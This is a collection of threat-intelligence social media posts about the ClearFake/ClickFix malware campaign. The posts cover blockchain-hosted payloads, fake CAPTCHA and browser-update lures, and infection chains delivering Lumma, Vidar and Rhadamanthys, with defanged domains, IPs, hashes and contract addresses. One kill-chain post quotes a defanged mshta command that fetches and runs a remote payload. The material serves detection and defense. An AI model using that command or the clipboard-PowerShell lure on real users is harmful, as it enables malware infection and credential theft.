.ru serious? 🇷🇺 ccTLD .ru had an unbelievable +3741% ⏫ in #botnet C&C domains, placing it #1 for the most abused ccTLD in the latter half of 2025. This activity can be attributed almost entirely to #clearfake, a malicious JavaScript framework.
Learn more in the Botnet Threat Update Jul - Dec 2025 ⤵️ ⤵️
https://www.spamhaus.org/resource-hub/botnet-c-c/botnet-threat-update-july-to-december-2025/
📢 Expel décrit une évolution de ClearFake/ClickFix qui héberge ses charges via des smart contracts
📝 Source et contexte: Expel (blog, Marcus Hutchins, 20 janv.
📖 cyberveille : https://cyberveille.ch/posts/2026-01-22-expel-decrit-une-evolution-de-clearfake-clickfix-qui-heberge-ses-charges-via-des-smart-contracts/
🌐 source : https://expel.com/blog/clearfake-new-lotl-techniques/
#ClearFake #EtherHiding #Cyberveille
ClearFake gets more evasive with new living off the land (LOTL) techniques
#Clearfake
https://expel.com/blog/clearfake-new-lotl-techniques/
🚨 ClearFake Payload Delivery Domain Identified
A domain linked to ClearFake activity has been flagged delivering a js.clearfake payload with 100% confidence.
Quick Facts:
▪️Type: Domain
▪️Indicator: x5ust[.]windshift[.]ru
▪️Threat Type: Payload Delivery
▪️Malware: js.clearfake
▪️Date: 05 Dec 2025 // 00:17 UTC
▪️Tags: #ClearFake
▪️Reporter: threatcat_ch
URLScan:
▪️Verdict: 0
▪️Title: FASTPANEL
▪️Domain: https://urlscan.io/domain/x5ust.windshift.ru
▪️Result: https://urlscan.io/result/019aebe2-3c71-77ff-9e6d-5d225679e78a/
▪️Screenshot: https://urlscan.io/screenshots/019aebe2-3c71-77ff-9e6d-5d225679e78a.png
DNS / CT Data:
▪️A Records: 104.21.19.50, 172.67.185.61
▪️DNSlytics: https://dnslytics.com/domain/x5ust.windshift.ru
Related Intelligence:
▪️CRT: https://crt.sh/?q=x5ust.windshift.ru
▪️VirusTotal: https://www.virustotal.com/gui/domain/x5ust.windshift.ru
Here is our in-depth analysis of the latest #ClearFake variant using the Binance Smart Chain and two new ClickFix lures.
ClearFake is injected into thousands of compromised sites to distribute the #Emmental Loader, #Lumma, #Rhadamanthys, and #Vidar.
CTI tip: monitor transactions from the Ethereum address 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA to identify new PowerShell commands distributed by ClearFake - and block/detect any traffic to malicious domains!
As usual, feedback is greatly appreciated!
TDR analysts published an analysis of the new #ClearFake variant that relies on compromised websites injected with the malicious JavaScript framework, the #EtherHiding technique, and the #ClickFix social engineering tactic.
#ClearFake variant is now spreading #Rhadamanthys Stealer via #Emmenhtal Loader.
cc @sekoia_io
1. ClearFake framework is injected on compromised WordPress and relies on EtherHiding
2. The #ClickFix lure uses a fake Cloudflare Turnstile with unusual web traffic
3. Malicious PowerShell command is copied into the user's clipboard data to be executed in the Run dialog box
4. Downloading Emmenhtal from:
bytes.microstorage.]shop (1st stage)
w66.discoverconicalcrouton.]shop (2nd stage)
5. Further downloading and executing Rhadamanthys from:
bytes.microstorage.]shop/code.bin (https://virustotal.com/gui/file/a88c153e1595f9d193b3f881ec77e0d7d338ae22c9f6e67ffdf39c3609fcdbf7)
6. Communicating with C2 at:
91.240.118.]2:9769
Public analysis of the recent ClearFake variant: https://security.szustak.pl/etherhide/etherhide.html
Whenever you run something inside a Windows Run dialog box, apparently it gets saved to the registry under the RunMRU key.
This can be helpful for those of you hunting for ClickFix / ClearFake campaign activity since anything executed after the run dialog has a better chance of blending into benign activity.
Building regex patterns on the registry key values can help uncover any malicious commands with multiple arguments.
#clickfix #clearfake #threathunting
https://forensafe.com/blogs/runmrukey.html
While investigating an infected website, we noticed call to BSC testnet contract 0x0967296defa0fd586c9ede5730380e2b059fab95 : https://testnet.bscscan.com/address/0x0967296defa0fd586c9ede5730380e2b059fab95
The contract’s content is clearly malicious and connects over WebSocket to suckerity[.]xyz (behind Cloudflare), not related to #ClearFake, but reminds us #Magecart related injections:
#etherhiding (hiding malicious code in blockchain based smart contracts) is not only by #ClearFake related actors – but now also for #Magecart 👇
2025-02-05 (Wednesday): #ClearFake / #ClickFix style fake CAPTCHA leads to possible #Vidar.
Vidar C2 using eteherealpath[.]top behind Cloudflare.
Вредоносный код навсегда сохранили в блокчейне
Один из старых хакерских трюков — распространять вредоносное ПО под видом обновления браузера . На взломанном сайте размещается плашка с утверждением, что для просмотра нужно обновить браузер. И кнопка для скачивания обновления, как на скриншоте с прошлогодней атаки ClearFake . Таким образом, жертва самостоятельно устанавливает вредоносное ПО на свой компьютер. В прошлом году злоумышленники разработали умный способ защитить вредоносный софт от уничтожения. Они разместили его в децентрализованном анонимном блокчейне . То есть интегрировали код в смарт-контракт, который навечно сохранился в открытом доступе.
https://habr.com/ru/companies/globalsign/articles/878822/
#блокчейн #обновление_браузера #BSC #Binance_Smart_Chain #Binance #BNB #WordPress #ClearFake #BscScan #EtherHiding
Campaign employs the Etherhide technique, where payloads are delivered from smart Web3 contracts and Cloudflare-hosted sites spreading Vidar malware across infected ~5k wordpress websites. The campaign has been active for ~3 months as of 2024-11-24. #Binance #EtherHide #ClearFake #ClickFix #Malware #IOC #przepisyjoli ;)
#Clearfake killchain today:
victim site
-->
data-seed-prebsc-1-s1.bnbchain[.]org (0x80d31D935f0EC978253A26D48B5593599B9542C7)
-->
clickfix popup
-->
mshta hxxps[:]//solve.lzmb[.]org/awjsx.captcha?u={usr_id} # ✅ ''I am not a robot - reCAPTCHA Verification ID: 9973''
-->
hxxps[:]//u1.jumpcelibateencounter[.]shop/sh_RTXY4.mp4
(2b4ea59a346f5762e0e5731e0e736b08607e652424f49398ca4dfe593187565c)
Ultimately delivers Lumma
#ClearFake / #ClickFix is back infecting directly legit but vulnerable websites, delivering in the end #Lumma / #LummaStealer
#ClearFake variant (without using the EtherHiding technique) is spreading the #Lumma via the #ClickFix tactic on compromised websites.
- Sends fingerprint data to 176.59.196.]133/ip.php
- Copies PowerShell script to clipboard
- Downloads ZIP from GitHub
- Executes Lumma
Example of website compromised by ClearFake on urlscan:
https://urlscan.io/result/fa9231e0-8499-46ac-a616-1c5509cba545/
PowerShell script copied to clipboard:
https://gist.github.com/qbourgue/61064f3c1acdcad88a04f3d1eef9db9a
Malicious ZIP payload (Lumma):
https://tria.ge/241029-1dp31s1phk/behavioral2
Lumma C2:
requireow.]biz
snailyeductyi.]sbs
ferrycheatyk.]sbs
deepymouthi.]sbs
wrigglesight.]sbs
captaitwik.]sbs
sidercotay.]sbs
heroicmint.]sbs
monstourtu.]sbs
Payload hosting URL (404):
hxxps://github.]com/Vlad-A41323/PowerSheell/raw/refs/heads/main/Seven_NSKJY_x91.2.zip
New Swiss centered malware campaign in German using some #ClearFake / #ClickFix tricks impersonating Ricardo, one of the biggest Swiss online second-hand marketplace:
Finally we also witnessed in the wild one of those #ClearFake / #ClickFix bait delivered per email as reported by Proofpoint in June - ending with a #brutel / #Latrodectus / #BruteRatel
payload https://www.proofpoint.com/au/blog/threat-insight/clipboard-compromise-powershell-self-pwn
@monitorsg #ClearFake is back to fake browser updates. The EXE leads to a Lumma stealer that appears to use these domains.
predatowpmn[.]shop
preachstrwnwjw[.]shop
pang-scrooge-carnage[.]shop
h/t @GustyDusty
Detected #ClearFake infection chain
Compromised site
-->
bsc-dataseed3.defibit[.]io (Binance 0xC4D41e800A4C05ce291f6AE4baF49b002a081290)
-->
quickresource[.]xyz/VWBhLwJg/
-->
dl.dropboxusercontent[.]com (download)
d5558bb4f7db0aab0c709068a9561cd79eafaf035038d42f321620c94883762a Installer.exe
